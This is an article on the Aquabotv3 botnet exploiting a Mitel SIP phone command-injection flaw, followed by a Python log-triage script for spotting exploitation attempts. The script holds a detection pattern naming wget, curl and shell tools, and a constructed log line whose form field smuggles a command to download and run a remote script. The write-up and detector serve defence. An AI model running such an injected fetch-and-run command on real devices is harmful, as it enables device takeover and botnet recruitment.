A new variant of the Mirai-based Aquabot botnet, tracked as Aquabotv3, has been actively exploiting a command injection vulnerability in Mitel SIP phones. The vulnerability, CVE-2024-41710, affects Mitel's 6800, 6900 and 6900w series phones. It is rated medium severity because exploitation requires authentication: an attacker who already holds admin credentials for the phone's web interface can perform an argument injection attack, which can lead to arbitrary command execution on the device. Mitel published an advisory and fixes in July 2024. Aquabotv3 is the first documented in-the-wild exploitation of the flaw; before this, the vulnerability had been demonstrated only in a proof-of-concept published by security researcher Kyle Burns in late July.
Akamai's Security Intelligence and Response Team (SIRT) first observed Aquabotv3 exploiting this flaw in early January 2025. The exploit targets the phone's 8021xsupport.html endpoint: input submitted to that page is not sufficiently sanitized before it is written into the phone's local configuration file, and that file is processed when the device boots. An attacker can therefore inject parameters into the configuration that cause the phone to fetch and execute a remote shell script, which in turn downloads and runs the Aquabot payload. The malware then establishes persistence so that it keeps running after the device is rebooted, and connects to its command-and-control (C2) server to receive further instructions, attack commands, or additional payloads.
Once installed, Aquabotv3 also acts as a propagator, attempting to spread to other vulnerable devices reachable from the infected phone. It uses a set of known vulnerabilities in other Internet of Things (IoT) devices, including flaws in TP-Link routers, Linksys devices and Dasan routers, and it brute-forces weak SSH and Telnet credentials to take over poorly secured devices. Every device it compromises is added to a distributed denial-of-service (DDoS) swarm, which the operators use for large-scale attacks, including TCP SYN floods, TCP ACK floods and application-layer assaults.
Aquabotv3's operators advertise the botnet's DDoS capabilities on Telegram under names such as Cursinq Firewall, The Eye Services and The Eye Botnet, marketing it as a "stress-testing" tool for DDoS mitigation, a common cover for DDoS-for-hire services. Akamai has published indicators of compromise (IoCs) for Aquabotv3, along with Snort and YARA rules, so that organizations can detect the malware and block its traffic. Because exploitation of CVE-2024-41710 requires admin credentials, applying Mitel's July 2024 fixes, keeping the phones' admin credentials strong and unique, and keeping the phones' web interface off untrusted networks removes this vector.
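As an added example of the kind of check described above (the exploit's POST to 8021xsupport.html in the second paragraph, and the detection resources in this one), the following Python script triages HTTP access logs for exploitation attempts. It is not Akamai's Snort/YARA rule set nor Mitel's code. It assumes a CLF-style access log (from the phone itself or a reverse proxy in front of it) with the URL-encoded POST body appended as a final quoted field, and a management subnet (MGMT_NET) from which admin access is expected; the injection markers are heuristics, and every log line is constructed for illustration.

```python
"""Heuristic triage of HTTP access logs for CVE-2024-41710 exploitation attempts.

Added example; not Akamai's published Snort/YARA rules and not Mitel's code.
Assumes a CLF-style access log with the URL-encoded POST body appended as a
final quoted field, and a management subnet from which admin access is expected.
All log lines below are constructed for illustration.
"""
import ipaddress
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl

# The endpoint abused by the exploit (named in the write-up above).
TARGET_PATH = "/8021xsupport.html"

# Assumption: phones are administered only from this subnet.
MGMT_NET = ipaddress.ip_network("10.0.50.0/24")

# Heuristic markers of shell/argument injection or of the remote script fetch
# described above. Illustrative, not an authoritative signature.
INJECTION_MARKERS = [
    re.compile(r"[;|`]"),                 # command separators / backticks
    re.compile(r"\$\("),                  # command substitution
    re.compile(r"\b(wget|curl|tftp)\b"),  # fetching a remote payload
    re.compile(r"https?://"),             # URL smuggled into a form value
    re.compile(r"/bin/(ba)?sh"),          # explicit shell invocation
    re.compile(r"\.sh\b"),                # shell script name
]

# CLF-like line: src ident user [ts] "METHOD path proto" status size "body"?
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<body>.*)")?$'
)


@dataclass
class Finding:
    src: str
    ts: str
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def assess(entry):
    """Return the reasons an entry looks like an exploitation attempt (empty if none)."""
    reasons = []
    if entry["method"] != "POST" or entry["path"].split("?", 1)[0] != TARGET_PATH:
        return reasons  # only POSTs to the vulnerable page are of interest
    try:
        if ipaddress.ip_address(entry["src"]) not in MGMT_NET:
            reasons.append("POST to 8021xsupport.html from outside the management subnet")
    except ValueError:
        reasons.append("unparseable source address")
    # parse_qsl splits on '&' and percent-decodes, so the '&' between form
    # fields is not mistaken for a shell operator and an encoded ';' is caught.
    for name, value in parse_qsl(entry.get("body") or "", keep_blank_values=True):
        for pat in INJECTION_MARKERS:
            if pat.search(value):
                reasons.append(f"injection marker {pat.pattern!r} in field {name!r}")
                break
    return reasons


def scan(lines):
    """Run assess() over raw log lines; return one Finding per suspicious line."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = assess(entry)
        if reasons:
            findings.append(Finding(entry["src"], entry["ts"], reasons))
    return findings


# Constructed sample log, not captured traffic.
SAMPLE_LOG = [
    # Admin on the management subnet pushing an ordinary 802.1x setting.
    '10.0.50.12 - admin [09/Jan/2025:10:01:02 +0000] "POST /8021xsupport.html HTTP/1.1" 200 512 "eap=PEAP&identity=phone01&pass=Secret1"',
    # Unrelated browsing of the phone UI.
    '10.0.50.12 - admin [09/Jan/2025:10:02:10 +0000] "GET /status.html HTTP/1.1" 200 2048',
    # Exploit-style request from an external address: a form value carrying a
    # shell command that fetches and runs a script (illustrative, not a real payload).
    '203.0.113.77 - admin [09/Jan/2025:10:05:44 +0000] "POST /8021xsupport.html HTTP/1.1" 200 512 '
    '"eap=PEAP&identity=x%3B%20wget%20http%3A%2F%2F203.0.113.77%2Fbot.sh%20-O%20%2Ftmp%2Fb.sh%3B%20sh%20%2Ftmp%2Fb.sh"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.src}: " + "; ".join(f.reasons))
```

Run stand-alone, the script flags only the third line, for two independent reasons: the request came from outside the management subnet, and the decoded identity field contains a command separator. Checking per form field after percent-decoding matters; matching the raw body would either miss encoded metacharacters or, if `&` were treated as an operator, flag every legitimate form submission.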